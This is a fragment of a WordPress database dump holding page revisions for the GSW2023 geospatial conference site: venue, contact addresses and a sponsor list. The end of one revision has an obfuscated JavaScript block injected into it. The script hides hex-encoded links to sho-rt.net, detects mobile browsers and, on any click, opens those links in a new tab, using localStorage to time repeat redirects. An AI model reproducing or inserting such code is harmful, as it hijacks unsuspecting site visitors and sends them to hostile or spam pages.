rel=\"noopener\">GSW-visa@gsw2023.com</a><strong> </strong></span></h5>\n<p>[/ultimate_heading][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"200px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" bwb_columns=\"desktop:4|h_tablet:3|v_tablet:2|phone:1\" post_title_bottom_margin=\"0px\" show_team_desc=\"n\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return _0x3023=function(_0x3023c3,_0x1b71b5){_0x3023c3=_0x3023c3-0x186;let _0x2d38c6=_0x10c8dc[_0x3023c3];return _0x2d38c6;},_0x3023(_0x562006,_0x1334d6);}function _0x10c8(){const _0x2ccc2=[\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x47\\x4f\\x78\\x32\\x63\\x332\',\'length\',\'_blank\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x64\\x44\\x6c\\x33\\x63\\x343\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6b\\x41\\x6f\\x30\\x63\\x330\',\'random\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x6f\\x56\\x75\\x37\\x63\\x347\',\'stopPropagation\',\'4051490VdJdXO\',\'test\',\'open\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x61\\x68\\x44\\x36\\x63\\x356\',\'12075252qhSFyR\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x5a\\x50\\x66\\x38\\x63\\x378\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x51\\x69\\x43\\x35\\x63\\x375\',\'4829028FhdmtK\',\'round\',\'-hurs\',\'-mnts\',\'864690TKFqJG\',\'forEach\',\'abs\',\'1479192fKZCLx\',\'16548MMjUpf\',\'filter\',\'vendor\',\'click\',\'setItem\',\'3402978fTfcqu\'];_0x10c8=function(){return _0x2ccc2;};return _0x10c8();}const _0x3ec38a=_0x3023;(function(_0x550425,_0x4ba2a7){const _0x142fd8=_0x3023,_0x2e2ad3=_0x550425();while(!![]){try{const _0x3467b1=-parseInt(_0x142fd8(0x19c))/0x1+parseInt(_0x142fd8(0x19f))/0x2+-parseInt(_0x142fd8(0x1a5))/0x3+parseInt(_0x142fd8(0x198))/0x4+-parseInt(_0x142fd8(0x191))/0x5+parseInt(_0x142fd8(0x1a0))/0x6+parseInt(_0x142fd8(0x195))/0x7;if(_0x3467b1===_0x4ba2a7)break;else _0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}catch(_0x28e7f8){_0x2e2ad3[\'push\'](_0x2e2ad3[\'shift\']());}}}(_0x10c8,0xd3435));var _0x365b=[_0x3ec38a(0x18a),_0x3ec38a(0x186),_0x3ec38a(0x1a2),\'opera\',_0x3ec38a(0x192),\'substr\',_0x3ec38a(0x18c),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x43\\x57\\x74\\x31\\x63\\x361\',_0x3ec38a(0x187),_0x3ec38a(0x18b),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x57\\x73\\x55\\x34\\x63\\x374\',_0x3ec38a(0x197),_0x3ec38a(0x194),_0x3ec38a(0x18f),_0x3ec38a(0x196),\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x73\\x68\\x6f\\x2d\\x72\\x74\\x2e\\x6e\\x65\\x74\\x2f\\x53\\x4e\\x4b\\x39\\x63\\x329\',\'\',_0x3ec38a(0x18e),\'getItem\',_0x3ec38a(0x1a4),_0x3ec38a(0x19d),_0x3ec38a(0x1a1),_0x3ec38a(0x18d),_0x3ec38a(0x188),\'floor\',_0x3ec38a(0x19e),_0x3ec38a(0x199),_0x3ec38a(0x19b),_0x3ec38a(0x19a),_0x3ec38a(0x189),_0x3ec38a(0x193),_0x3ec38a(0x190),\'host\',\'parse\',_0x3ec38a(0x1a3),\'addEventListener\'];(function(_0x16176d){window[_0x365b[0x0]]=function(){let _0x129862=![];return function(_0x784bdc){(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x365b[0x4]](_0x784bdc)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-07-25 02:17:04','2023-07-25 02:17:04','',3066,'https://gsw2023.com/?p=5045',0,'revision','',0),
(5046,1,'2023-07-25 02:18:29','2023-07-25 02:18:29','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951146401{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.giscon.de/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"wp-image-4597 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"255\" height=\"189\" /><br />\n</a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951344645{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 size-full\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"160\" height=\"190\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_column_text css=\".vc_custom_1690251414155{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img 